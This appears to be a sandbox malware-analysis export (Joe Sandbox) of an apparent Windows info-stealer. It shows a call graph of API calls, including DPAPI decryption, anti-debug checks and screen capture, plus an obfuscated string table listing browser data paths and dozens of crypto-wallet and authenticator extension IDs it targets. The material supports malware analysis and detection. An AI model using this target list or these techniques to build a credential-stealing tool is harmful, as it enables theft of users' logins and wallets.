70766->70768 70769 4569cd 70766->70769 70785 44e560 EnterCriticalSection LeaveCriticalSection __dosmaperr 70766->70785 70767->70770 70768->70766 70768->70770 70784 4447a4 14 API calls __dosmaperr 70769->70784 70770->70753 70773->70753 70774->70753 70775->70749 70776->70749 70778 422958 70777->70778 70786 424995 20 API calls 2 library calls 70778->70786 70780 4244a9 70781 4262a1 58 API calls 70780->70781 70781->70780 70782->70753 70783->70753 70784->70770 70785->70766 70786->70780 70796 402ff9 70787->70796 70788 403349 70789 402fcc 6 API calls 70788->70789 70790 40112c 6 API calls 70788->70790 70788->70796 70900 40112c 8 API calls __aullrem 70788->70900 70789->70788 70790->70788 70791 4033ee 70791->70693 70792 401ff9 6 API calls 70792->70796 70793 402fcc 6 API calls 70793->70796 70794 402476 6 API calls 70794->70796 70796->70788 70796->70791 70796->70792 70796->70793 70796->70794 70798 40200e 70797->70798 70799 402fcc 6 API calls 70798->70799 70800 401c1e 6 API calls 70798->70800 70801 402426 ExitProcess 70798->70801 70802 402083 70798->70802 70805 402221 70798->70805 70901 401c1e 70798->70901 70799->70798 70800->70798 70802->70798 70803 40112c 6 API calls 70802->70803 70803->70802 70805->70693 70806 4020ce Sleep 70807 401c1e 6 API calls 70806->70807 70807->70798 70820 402482 70808->70820 70809 402af0 GetComputerNameW 70809->70820 70810 402be1 GetUserNameW 70810->70820 70811 402b69 70811->70693 70812 401ff9 6 API calls 70812->70820 70813 40112c 6 API calls 70819 402555 70813->70819 70814 402476 6 API calls 70814->70820 70815 402476 6 API calls 70815->70819 70816 402fcc 6 API calls 70816->70820 70817 401ff9 6 API calls 70817->70819 70818 401c1e 6 API calls 70818->70820 70819->70813 70819->70815 70819->70817 70819->70820 70820->70809 70820->70810 70820->70811 70820->70812 70820->70814 70820->70816 70820->70818 70820->70819 70832 43023b CallUnexpected 70821->70832 70822 42f278 206 API calls 70822->70832 70823 4309a8 70823->70693 70823->70823 70824 447e24 ___std_exception_copy 15 API calls 70824->70832 70825 438e28 3 API calls 70825->70832 70826 40b81c 43 API calls 70826->70832 70827 42fd35 206 API calls 70827->70832 70828 430228 206 API calls 70828->70832 70829 42f625 206 API calls 70829->70832 70830 447a80 ___std_exception_destroy 14 API calls 70830->70832 70831 41f9a4 58 API calls 70831->70832 70832->70822 70832->70823 70832->70824 70832->70825 70832->70826 70832->70827 70832->70828 70832->70829 70832->70830 70832->70831 70833 40b7bb 43 API calls 70832->70833 70833->70832 70847 436af4 __fread_nolock CallUnexpected _wctomb_s _strlen 70834->70847 70835 434fac 15 API calls 70835->70847 70836 438e28 3 API calls 70840 438a76 GetPhysicallyInstalledSystemMemory 70836->70840 70837 438019 70837->70693 70838 419e6b 127 API calls 70838->70847 70839 438e28 LoadLibraryW GetPEB lstrcmpiW 70839->70847 70840->70847 70841 438b8c EnumDisplayDevicesA 70841->70847 70842 437265 KiUserCallbackDispatcher 70842->70847 70843 434040 46 API calls 70843->70847 70844 44568a 29 API calls 70844->70847 70845 436adc 176 API calls 70845->70847 70847->70835 70847->70836 70847->70837 70847->70838 70847->70839 70847->70841 70847->70842 70847->70843 70847->70844 70847->70845 70849 41f9a4 58 API calls 70847->70849 70908 41d057 70847->70908 70914 44be84 43 API calls __wfreopen_s 70847->70914 70915 4360e1 70847->70915 70849->70847 70866 434090 CallUnexpected _wctomb_s _strlen 70851->70866 70852 434f14 RegCloseKey 70852->70866 70853 434be9 RegQueryValueExW 70853->70866 70854 434f73 RegCloseKey 70854->70866 70855 434d8e RegOpenKeyExW 70855->70866 70856 4346ce wsprintfW 70856->70866 70857 434706 RegEnumKeyExW 70857->70866 70858 434758 RegCloseKey 70858->70866 70859 434954 RegOpenKeyExW 70859->70866 70860 434ce5 wsprintfW 70860->70866 70861 434080 127 API calls 70861->70866 70862 447a80 14 API calls ___std_exception_destroy 70862->70866 70863 4349e7 70863->70693 70865 419e6b 127 API calls 70865->70866 70866->70852 70866->70853 70866->70854 70866->70855 70866->70856 70866->70857 70866->70858 70866->70859 70866->70860 70866->70861 70866->70862 70866->70863 70866->70865 70920 419496 106 API calls 3 library calls 70866->70920 70868 433c23 70867->70868 70869 419e6b 127 API calls 70868->70869 70870 433d34 70868->70870 70872 4338b5 198 API calls 70868->70872 70874 434022 GetProcessHeap RtlFreeHeap 70868->70874 70875 43323b 198 API calls 70868->70875 70921 430e6c 70868->70921 70942 43350d 200 API calls 70868->70942 70943 432718 70868->70943 70869->70868 70872->70868 70874->70693 70875->70868 70878 421f01 70877->70878 70879 4220b5 GetPEB 70878->70879 70880 4279e0 GetPEB 70878->70880 70881 421f6c NtQueryInformationProcess 70878->70881 70882 42215d 70878->70882 70879->70878 70880->70878 70881->70878 70882->70693 70884 4224b4 70883->70884 70885 4227be NtQueryInformationProcess 70884->70885 70886 422795 GetPEB 70884->70886 70887 4279e0 GetPEB 70884->70887 70888 422802 70884->70888 70885->70884 70886->70884 70887->70884 70888->70693 70890 42cfd0 70889->70890 70891 42d5bb 70890->70891 70892 42b9c5 223 API calls 70890->70892 70893 42cfba 223 API calls 70890->70893 70894 419b9d 72 API calls 70890->70894 70896 42c0da 223 API calls 70890->70896 70898 41a28f 182 API calls 70890->70898 70899 42b9ae 206 API calls 70890->70899 70992 42ca0d 70890->70992 71007 42ad82 70890->71007 70891->70693 70892->70890 70893->70890 70894->70890 70896->70890 70898->70890 70899->70890 70900->70796 70907 401c31 70901->70907 70902 401ebc GetSystemTimeAsFileTime 70902->70907 70903 401ff9 7 API calls 70903->70907 70904 402fcc 7 API calls 70904->70907 70905 401f62 __aulldiv 70905->70806 70906 401c1e 7 API calls 70906->70907 70907->70902 70907->70903 70907->70904 70907->70905 70907->70906 70909 447e24 ___std_exception_copy 15 API calls 70908->70909 70910 41d065 70909->70910 70911 438e28 3 API calls 70910->70911 70912 41d079 GetCurrentHwProfileA 70911->70912 70913 41d083 70912->70913 70913->70847 70914->70847 70919 436133 70915->70919 70916 43669e 70916->70847 70917 447e24 ___std_exception_copy 15 API calls 70917->70919 70918 4360e1 15 API calls 70918->70919 70919->70916 70919->70917 70919->70918 70920->70866 70929 430e85 70921->70929 70922 4321e3 GetDIBits ReleaseDC 70922->70929 70923 431d2b RtlAllocateHeap 70923->70929 70924 431e4c GetObjectW 70924->70929 70925 4338b5 186 API calls 70925->70929 70926 4325bf GetProcessHeap 70926->70929 70927 432097 GetProcessHeap 70927->70929 70928 4228cf 58 API calls 70928->70929 70929->70922 70929->70923 70929->70924 70929->70925 70929->70926 70929->70927 70929->70928 70930 431c69 GetDC 70929->70930 70931 4314b2 GetProcessHeap 70929->70931 70932 4314e4 HeapAlloc 70929->70932 70933 43323b 186 API calls 70929->70933 70934 4326e0 GetProcessHeap RtlFreeHeap GetProcessHeap HeapFree 70929->70934 70935 433c10 186 API calls 70929->70935 70936 430e6c 186 API calls 70929->70936 70937 430f3a RtlAllocateHeap 70929->70937 70938 432b1b 186 API calls 70929->70938 70939 431902 70929->70939 70940 43350d 186 API calls 70929->70940 70941 432718 186 API calls 70929->70941 70930->70929 70931->70929 70932->70929 70933->70929 70934->70868 70935->70929 70936->70929 70937->70929 70938->70929 70939->70939 70940->70929 70941->70929 70942->70868 70955 43272e 70943->70955 70944 432a26 BitBlt 70944->70955 70945 432a76 CreateCompatibleBitmap 70945->70955 70946 432a5b SelectObject 70946->70955 70947 432a0e SelectObject 70947->70955 70948 432893 CreateCompatibleDC 70948->70955 70949 432943 70950 432afb DeleteDC DeleteObject 70950->70868 70951 430e6c 193 API calls 70951->70955 70953 4338b5 193 API calls 70953->70955 70955->70944 70955->70945 70955->70946 70955->70947 70955->70948 70955->70949 70955->70950 70955->70951 70955->70953 70956 432718 193 API calls 70955->70956 70957 432b1b 70955->70957 70969 43350d 200 API calls 70955->70969 70956->70955 70958 432b24 70957->70958 70959 432eb3 SystemParametersInfoW 70958->70959 70960 433c10 197 API calls 70958->70960 70961 43302c GetDesktopWindow GetDC 70958->70961 70962 432fe8 70958->70962 70963 432b1b 197 API calls 70958->70963 70964 43350d 197 API calls 70958->70964 70965 430e6c 197 API calls 70958->70965 70966 4338b5 197 API calls 70958->70966 70968 432718 197 API calls 70958->70968 70970 43323b 70958->70970 70959->70958 70960->70958 70961->70958 70962->70955 70962->70962 70963->70958 70964->70958 70965->70958 70966->70958 70968->70958 70969->70955 70978 433253 70970->70978 70971 43341c GetSystemMetrics 70971->70978 70972 433448 70973 4334f3 DeleteDC 70973->70958 70974 4333c1 GetSystemMetrics 70974->70978 70975 43327e CreateDCW 70975->70978 70976 432718 196 API calls 70976->70978 70977 43350d 196 API calls 70977->70978 70978->70971 70978->70972 70978->70973 70978->70974 70978->70975 70978->70976 70978->70977 70980 4338b5 70978->70980 70988 4338cd 70980->70988 70981 432b1b 199 API calls 70981->70988 70982 43323b 199 API calls 70982->70988 70983 432718 199 API calls 70983->70988 70984 4338b5 199 API calls 70984->70988 70985 4339bb 70986 433c10 199 API calls 70986->70988 70987 433be8 70990 430e6c 199 API calls 70987->70990 70988->70981 70988->70982 70988->70983 70988->70984 70988->70985 70988->70986 70988->70987 70989 430e6c 199 API calls 70988->70989 70989->70988 70991 433bfc DeleteObject 70990->70991 70991->70978 71000 42ca20 70992->71000 70993 40e14e 161 API calls 70993->71000 70994 42ca0d 223 API calls 70994->71000 70996 42cfa7 71002 447a80 ___std_exception_destroy 14 API calls 70996->71002 70997 447e24 ___std_exception_copy 15 API calls 70997->71000 70998 42ad82 223 API calls 70998->71000 70999 42cb4e 71000->70993 71000->70994 71000->70996 71000->70997 71000->70998 71000->70999 71001 42cfba 223 API calls 71000->71001 71003 438e28 3 API calls 71000->71003 71006 40b7bb 43 API calls 71000->71006 71024 42b9ae 71000->71024 71027 42b9c5 71000->71027 71001->71000 71005 42cfb2 71002->71005 71003->71000 71005->70890 71006->71000 71023 42ad95 71007->71023 71008 447e24 15 API calls ___std_exception_copy 71008->71023 71009 42b7f1 71010 40e14e 161 API calls 71010->71023 71011 42b99e 71017 447a80 ___std_exception_destroy 14 API calls 71011->71017 71012 447a80 ___std_exception_destroy 14 API calls 71012->71023 71014 42cfba 223 API calls 71014->71023 71015 42b9ae 206 API calls 71015->71023 71016 42ad82 223 API calls 71016->71023 71020 42b9a6 71017->71020 71018 42b9c5 223 API calls 71018->71023 71019 438e28 LoadLibraryW GetPEB lstrcmpiW 71019->71023 71020->70890 71021 40b7bb 43 API calls 71021->71023 71022 42ca0d 223 API calls 71022->71023 71023->71008 71023->71009 71023->71010 71023->71011 71023->71012 71023->71014 71023->71015 71023->71016 71023->71018 71023->71019 71023->71021 71023->71022 71041 42c0da 71023->71041 71025 430228 206 API calls 71024->71025 71026 42b9c1 71025->71026 71026->71000 71040 42b9d5 71027->71040 71028 42c04f 71029 42ad82 223 API calls 71029->71040 71030 42ca0d 223 API calls 71030->71040 71031 447e24 ___std_exception_copy 15 API calls 71031->71040 71032 438e28 3 API calls 71032->71040 71033 42c0ca 71036 447a80 ___std_exception_destroy 14 API calls 71033->71036 71034 42b9c5 223 API calls 71034->71040 71035 42b9ae 206 API calls 71035->71040 71038 42c0d2 71036->71038 71037 40e14e 161 API calls 71037->71040 71038->71000 71039 40b7bb 43 API calls 71039->71040 71040->71028 71040->71029 71040->71030 71040->71031 71040->71032 71040->71033 71040->71034 71040->71035 71040->71037 71040->71039 71057 42c0ed 71041->71057 71042 42c878 71043 42ad82 223 API calls 71043->71057 71044 42c9fd 71049 447a80 ___std_exception_destroy 14 API calls 71044->71049 71045 42cfba 223 API calls 71045->71057 71046 42c0da 223 API calls 71046->71057 71047 40b7bb 43 API calls 71047->71057 71048 447e24 15 API calls ___std_exception_copy 71048->71057 71054 42ca05 71049->71054 71050 40e14e 161 API calls 71050->71057 71051 447a80 14 API calls ___std_exception_destroy 71051->71057 71052 42b9ae 206 API calls 71052->71057 71053 42b9c5 223 API calls 71053->71057 71054->71023 71055 438e28 3 API calls 71055->71057 71056 42ca0d 223 API calls 71056->71057 71057->71042 71057->71043 71057->71044 71057->71045 71057->71046 71057->71047 71057->71048 71057->71050 71057->71051 71057->71052 71057->71053 71057->71055 71057->71056 71059 443a37 71058->71059 71060 443a49 71058->71060 71085 4438d3 GetModuleHandleW 71059->71085 71070 443b8c 71060->71070 71063 443a3c 71063->71060 71086 443916 GetModuleHandleExW 71063->71086 71065 43ca83 71065->70645 71069 443a9b 71071 443b98 ___scrt_is_nonwritable_in_current_image 71070->71071 71092 44d13d EnterCriticalSection 71071->71092 71073 443ba2 71093 443aa1 71073->71093 71075 443baf 71097 443bcd 71075->71097 71078 4439ba 71102 443998 71078->71102 71081 4439d8 71083 443916 CallUnexpected 3 API calls 71081->71083 71082 4439c8 GetCurrentProcess TerminateProcess 71082->71081 71084 4439e0 ExitProcess 71083->71084 71085->71063 71087 443955 GetProcAddress 71086->71087 71088 443976 71086->71088 71087->71088 71091 443969 71087->71091 71089 443985 71088->71089 71090 44397c FreeLibrary 71088->71090 71089->71060 71090->71089 71091->71088 71092->71073 71094 443aad ___scrt_is_nonwritable_in_current_image 71093->71094 71096 443b14 CallUnexpected 71094->71096 71100 44446f 14 API calls 2 library calls 71094->71100 71096->71075 71101 44d154 LeaveCriticalSection 71097->71101 71099 443a80 71099->71065 71099->71078 71100->71096 71101->71099 71107 44fb15 GetPEB 71102->71107 71105 4439b4 71105->71081 71105->71082 71106 4439a2 GetPEB 71106->71105 71108 44399d 71107->71108 71109 44fb2f 71107->71109 71108->71105 71108->71106 71111 44ced5 71109->71111 71114 44cfe0 71111->71114 71115 44d00e 71114->71115 71116 44cef1 71114->71116 71115->71116 71121 44cf15 71115->71121 71116->71108 71119 44d028 GetProcAddress 71119->71116 71120 44d038 __dosmaperr 71119->71120 71120->71116 71127 44cf26 ___vcrt_FlsSetValue 71121->71127 71122 44cfbc 71122->71116 71122->71119 71123 44cf44 LoadLibraryExW 71124 44cfc3 71123->71124 71125 44cf5f GetLastError 71123->71125 71124->71122 71126 44cfd5 FreeLibrary 71124->71126 71125->71127 71126->71122 71127->71122 71127->71123 71128 44cf92 LoadLibraryExW 71127->71128 71128->71124 71128->71127 71129 2778a24 71130 2778a27 71129->71130 71133 2778cde 71130->71133 71134 2778ced 71133->71134 71137 277947e 71134->71137 71138 2779499 71137->71138 71139 27794a2 CreateToolhelp32Snapshot 71138->71139 71140 27794be Module32First 71138->71140 71139->71138 71139->71140 71141 2778cdd 71140->71141 71142 27794cd 71140->71142 71144 277913d 71142->71144 71145 2779168 71144->71145 71146 27791b1 71145->71146 71147 2779179 VirtualAlloc 71145->71147 71146->71146 71147->71146 71148 450330 71149 45033d __dosmaperr 71148->71149 71150 45037d 71149->71150 71151 450368 RtlAllocateHeap 71149->71151 71155 44e560 EnterCriticalSection LeaveCriticalSection __dosmaperr 71149->71155 71156 4447a4 14 API calls __dosmaperr 71150->71156 71151->71149 71153 45037b 71151->71153 71155->71149 71156->71153 71157 404c06 71158 404c19 71157->71158 71163 40a3c6 71158->71163 71160 404c66 71162 404c25 71162->71160 71171 4040f8 16 API calls _strlen 71162->71171 71164 40a428 71163->71164 71166 40a480 71163->71166 71167 447e24 15 API calls 71164->71167 71168 44eb6f 15 API calls 71164->71168 71165 40a447 71169 447e24 15 API calls 71165->71169 71170 44eb6f 15 API calls 71165->71170 71166->71162 71167->71165 71168->71165 71169->71166 71170->71166 71171->71162 71172 426b04 71173 426b49 __fread_nolock 71172->71173 71174 426f39 71173->71174 71175 447e24 ___std_exception_copy 15 API calls 71173->71175 71176 447a80 ___std_exception_destroy 14 API calls 71174->71176 71175->71173 71177 426f52 71176->71177 71178 4052d9 71189 4052ee __fread_nolock 71178->71189 71179 447e24 15 API calls ___std_exception_copy 71179->71189 71180 438e28 3 API calls 71180->71189 71183 438e28 3 API calls 71186 405567 CryptUnprotectData 71183->71186 71184 40b129 43 API calls 71184->71189 71185 405900 71187 447a80 ___std_exception_destroy 14 API calls 71186->71187 71187->71189 71189->71179 71189->71180 71189->71183 71189->71184 71189->71185 71190 447a80 ___std_exception_destroy 14 API calls 71189->71190 71191 4035d1 45 API calls 71189->71191 71192 405aaa 71189->71192 71212 434fac 71189->71212 71190->71189 71191->71189 71204 405ac3 CallUnexpected 71192->71204 71193 406018 lstrcatW 71193->71204 71194 4060e6 71195 405ebc lstrcatW 71197 4360e1 15 API calls 71195->71197 71196 405eed lstrcatW 71202 4360e1 15 API calls 71196->71202 71201 405ed0 lstrcatW lstrcatW 71197->71201 71199 405be7 lstrcatW 71199->71204 71201->71204 71206 405eff lstrcatW lstrcatW 71202->71206 71203 405bb6 71208 4360e1 15 API calls 71203->71208 71204->71193 71204->71194 71204->71195 71204->71196 71204->71199 71204->71203 71205 403600 101 API calls 71204->71205 71218 404edc 16 API calls 71204->71218 71219 4048e2 46 API calls 71204->71219 71220 404988 46 API calls 71204->71220 71205->71204 71206->71204 71209 4061ef 71208->71209 71210 40e14e 161 API calls 71209->71210 71211 406203 71210->71211 71211->71189 71216 434fc2 _strcat _strncpy _strlen 71212->71216 71213 435e8e 71213->71189 71214 447e24 ___std_exception_copy 15 API calls 71214->71216 71215 4360e1 15 API calls 71215->71216 71216->71213 71216->71214 71216->71215 71217 434fac 15 API calls 71216->71217 71217->71216 71218->71204 71219->71204 71220->71204 71221 420003c 71222 4200049 71221->71222 71236 4200e0f SetErrorMode SetErrorMode 71222->71236 71227 4200265 71228 42002ce VirtualProtect 71227->71228 71230 420030b 71228->71230 71229 4200439 VirtualFree 71234 42004be 71229->71234 71235 42005f4 LoadLibraryA 71229->71235 71230->71229 71231 42004e3 LoadLibraryA 71231->71234 71233 42008c7 71234->71231 71234->71235 71235->71233 71237 4200223 71236->71237 71238 4200d90 71237->71238 71239 4200dad 71238->71239 71240 4200238 VirtualAlloc 71239->71240 71241 4200dbb GetPEB 71239->71241 71240->71227 71241->71240 71242 4102de 71243 44814e 16 API calls 71242->71243 71244 4102f1 71243->71244
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?), ref: 00406AFC
                                                            • lstrcatW.KERNEL32(?,\Local Storage\leveldb), ref: 00406B06
                                                            • lstrcatW.KERNEL32(?,?,?), ref: 00408A66
                                                            • lstrcatW.KERNEL32(?,/BrowserDB), ref: 00408A70
                                                            Strings
                                                            • ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb, xrefs: 00408152
                                                            • UL6T, xrefs: 0040702D
                                                            • Hy576xedcon Lite Cli576xedent, xrefs: 004080C7
                                                            • GAu576xedth Authe576xednticator, xrefs: 00407298
                                                            • Hist576xedory, xrefs: 0040867F
                                                            • bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa, xrefs: 00408242
                                                            • One576xedKey, xrefs: 00407859
                                                            • dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm, xrefs: 00407AF8
                                                            • cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao, xrefs: 00407CC1
                                                            • imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk, xrefs: 00408216
                                                            • onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl, xrefs: 004080AE
                                                            • nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm, xrefs: 004081D0
                                                            • jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf, xrefs: 004075BB
                                                            • VL6T, xrefs: 0040891C
                                                            • nknhi576xedehlklippafakaeklbegl576xedecifhad, xrefs: 00408027
                                                            • bln576xedieiiffboi576xedllknjnepogjhkgnoapac, xrefs: 00408804
                                                            • ilgcn576xedhelpchnceeipipij576xedaljkblbcobl, xrefs: 004072A7
                                                            • Au576xedthy, xrefs: 00406CF1
                                                            • hcflp576xedincpppdclinealmandi576xedjcmnkbgn, xrefs: 0040804F
                                                            • Sa576xedturn, xrefs: 00407C8A
                                                            • Log576xedin Da576xedta Fo576xedr Acc576xedount, xrefs: 00408667
                                                            • By576xedone, xrefs: 004076ED
                                                            • Cl576xedover, xrefs: 004087AC
                                                            • Ron576xedin Wall576xedet, xrefs: 004085CE
                                                            • EnK576xedrypt, xrefs: 00408897
                                                            • /BrowserDB, xrefs: 00408A68
                                                            • Tro576xednLi576xednk, xrefs: 00407616
                                                            • nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig, xrefs: 00407C99
                                                            • Cy576xedano, xrefs: 00407AE5
                                                            • kkpllko576xeddjeloidieedojogacfhp576xedaihoh, xrefs: 004088A7
                                                            • flpici576xedilemghbmfalica576xedjoolhkkenfel, xrefs: 004075E4
                                                            • iW576xedlt, xrefs: 0040886F
                                                            • Uni576xedSat, xrefs: 004082D2
                                                            • nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd, xrefs: 00407D4F
                                                            • Te576xedrra Stat576xedion, xrefs: 0040724B
                                                            • kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj, xrefs: 0040887E
                                                            • Ke576xedplr, xrefs: 004084A0
                                                            • fhmfend576xedgdocmcbmfikdcog576xedofphimnkno, xrefs: 00408903
                                                            • ICO576xedNex, xrefs: 004075D4
                                                            • lodccj576xedjbdhfakaekdiahmedf576xedbieldgik, xrefs: 00407FBB
                                                            • ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo, xrefs: 004082E5
                                                            • W576xedeb Da576xedta, xrefs: 00408697
                                                            • fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi, xrefs: 00408856
                                                            • lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm, xrefs: 00408084
                                                            • Bi576xedtClip, xrefs: 00407FD4
                                                            • oel576xedjdldpnmdbchonieli576xeddgobddffflal, xrefs: 00406D28
                                                            • Gua576xedrda, xrefs: 00408423
                                                            • ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml, xrefs: 00407FE3
                                                            • Aut576xedhenti576xedcator, xrefs: 004074BA
                                                            • cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne, xrefs: 0040882E
                                                            • Liqu576xedality, xrefs: 00407EDD
                                                            • Ja576xedxx Lib576xederty, xrefs: 0040881F
                                                            • cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae, xrefs: 00407593
                                                            • Coi576xedn98, xrefs: 00407492
                                                            • nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj, xrefs: 00407D13
                                                            • ejbalbako576xedplchlghecda576xedlmeeeajnimhm, xrefs: 00406E55
                                                            • Te576xedmple, xrefs: 00408068
                                                            • infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf, xrefs: 00407868
                                                            • cihm576xedoadaighcej576xedopammfbmddcmdekcje, xrefs: 004086BB
                                                            • Coinb576xedase, xrefs: 004083FB
                                                            • hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad, xrefs: 0040840A
                                                            • Netw576xedork\Cook576xedies, xrefs: 00408505
                                                            • afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc, xrefs: 004083E2
                                                            • Nab576xedox, xrefs: 00408018
                                                            • fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp, xrefs: 00408128
                                                            • ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc, xrefs: 00407F69
                                                            • gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb, xrefs: 00406D00
                                                            • \Local Storage\leveldb, xrefs: 00406AFE
                                                            • Ste576xedem Key576xedchain, xrefs: 0040827B
                                                            • bcopg576xedchhojmggmff576xedilplmbdicgaihlkp, xrefs: 004080DA
                                                            • nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn, xrefs: 004087E8
                                                            • Bin576xedance Cha576xedin Wal576xedlet, xrefs: 004085F6
                                                            • mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh, xrefs: 00407F93
                                                            • bhgho576xedamapcdpbohphigoo576xedoaddinpkbai, xrefs: 004074C9
                                                            • Sol576xedlet, xrefs: 004088F4
                                                            • Pha576xedntom, xrefs: 0040822F
                                                            • jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid, xrefs: 00407D6E
                                                            • ME576xedW CX, xrefs: 004073DD
                                                            • Le576xedaf, xrefs: 00407881
                                                            • His576xedtory, xrefs: 004083AF
                                                            • EQ576xedUAL, xrefs: 004076A5
                                                            • Wom576xedbat, xrefs: 004077AD
                                                            • kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd, xrefs: 00407479
                                                            • NeoL576xedine, xrefs: 00407CB2
                                                            • Ma576xedth, xrefs: 004083D3
                                                            • Te576xedzBox, xrefs: 00407F84
                                                            • Na576xedsh Ex576xedtension, xrefs: 0040809F
                                                            • Tr576xedezor Passw576xedord Manager, xrefs: 00408207
                                                            • Me576xedtaMa576xedsk, xrefs: 00406E46, 004087D8
                                                            • E576xedOS Authenti576xedcator, xrefs: 00406D19
                                                            • fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec, xrefs: 004085DD
                                                            • Bit576xedApp, xrefs: 00408847
                                                            • hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln, xrefs: 0040768A
                                                            • Yo576xedroi, xrefs: 00408143
                                                            • EeS, xrefs: 00406B7F
                                                            • VL6T, xrefs: 004076C1
                                                            • Au576xedro, xrefs: 00407584
                                                            • aea576xedchknmefphepccio576xednboohckonoeemg, xrefs: 004074A1
                                                            • ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec, xrefs: 00407625
                                                            • amkmj576xedjmmflddogmhpjloim576xedipbofnfjih, xrefs: 004073C2
                                                            • dmkam576xedcknogkgcdfhhbddcghach576xedkejeap, xrefs: 004084B0
                                                            • Ni576xedfty, xrefs: 0040816B
                                                            • Gu576xedild, xrefs: 004081EB
                                                            • kpfop576xedkelmapcoipemfend576xedmdcghnegimn, xrefs: 00407EED
                                                            • Lo576xedgin Da576xedta, xrefs: 0040864F
                                                            • DAp576xedpPlay, xrefs: 00407FAC
                                                            • nhnk576xedbkgjikgcigadomkph576xedalanndcapjk, xrefs: 004087BC
                                                            • Zi576xedlPay, xrefs: 0040746A
                                                            • KH576xedC, xrefs: 00408040
                                                            • EeS, xrefs: 00407043
                                                            • aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp, xrefs: 0040725B
                                                            • Pol576xedymesh, xrefs: 004075AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: /BrowserDB$Au576xedro$Au576xedthy$Aut576xedhenti576xedcator$Bi576xedtClip$Bin576xedance Cha576xedin Wal576xedlet$Bit576xedApp$By576xedone$Cl576xedover$Coi576xedn98$Coinb576xedase$Cy576xedano$DAp576xedpPlay$E576xedOS Authenti576xedcator$EQ576xedUAL$EnK576xedrypt$EeS$EeS$GAu576xedth Authe576xednticator$Gu576xedild$Gua576xedrda$His576xedtory$Hist576xedory$Hy576xedcon Lite Cli576xedent$ICO576xedNex$Ja576xedxx Lib576xederty$KH576xedC$Ke576xedplr$Le576xedaf$Liqu576xedality$Lo576xedgin Da576xedta$Log576xedin Da576xedta Fo576xedr Acc576xedount$ME576xedW CX$Ma576xedth$Me576xedtaMa576xedsk$Na576xedsh Ex576xedtension$Nab576xedox$NeoL576xedine$Netw576xedork\Cook576xedies$Ni576xedfty$One576xedKey$Pha576xedntom$Pol576xedymesh$Ron576xedin Wall576xedet$Sa576xedturn$Sol576xedlet$Ste576xedem Key576xedchain$Te576xedmple$Te576xedrra Stat576xedion$Te576xedzBox$Tr576xedezor Passw576xedord Manager$Tro576xednLi576xednk$UL6T$Uni576xedSat$VL6T$VL6T$W576xedeb Da576xedta$Wom576xedbat$Yo576xedroi$Zi576xedlPay$\Local Storage\leveldb$aea576xedchknmefphepccio576xednboohckonoeemg$afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc$aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp$amkmj576xedjmmflddogmhpjloim576xedipbofnfjih$bcopg576xedchhojmggmff576xedilplmbdicgaihlkp$bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa$bhgho576xedamapcdpbohphigoo576xedoaddinpkbai$bln576xedieiiffboi576xedllknjnepogjhkgnoapac$cihm576xedoadaighcej576xedopammfbmddcmdekcje$cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne$cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae$cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao$dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm$dmkam576xedcknogkgcdfhhbddcghach576xedkejeap$ejbalbako576xedplchlghecda576xedlmeeeajnimhm$ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb$fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp$fhmfend576xedgdocmcbmfikdcog576xedofphimnkno$fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi$flpici576xedilemghbmfalica576xedjoolhkkenfel$fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec$gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb$hcflp576xedincpppdclinealmandi576xedjcmnkbgn$hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad$hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln$iW576xedlt$ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec$ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml$ilgcn576xedhelpchnceeipipij576xedaljkblbcobl$imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk$infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf$jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid$jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf$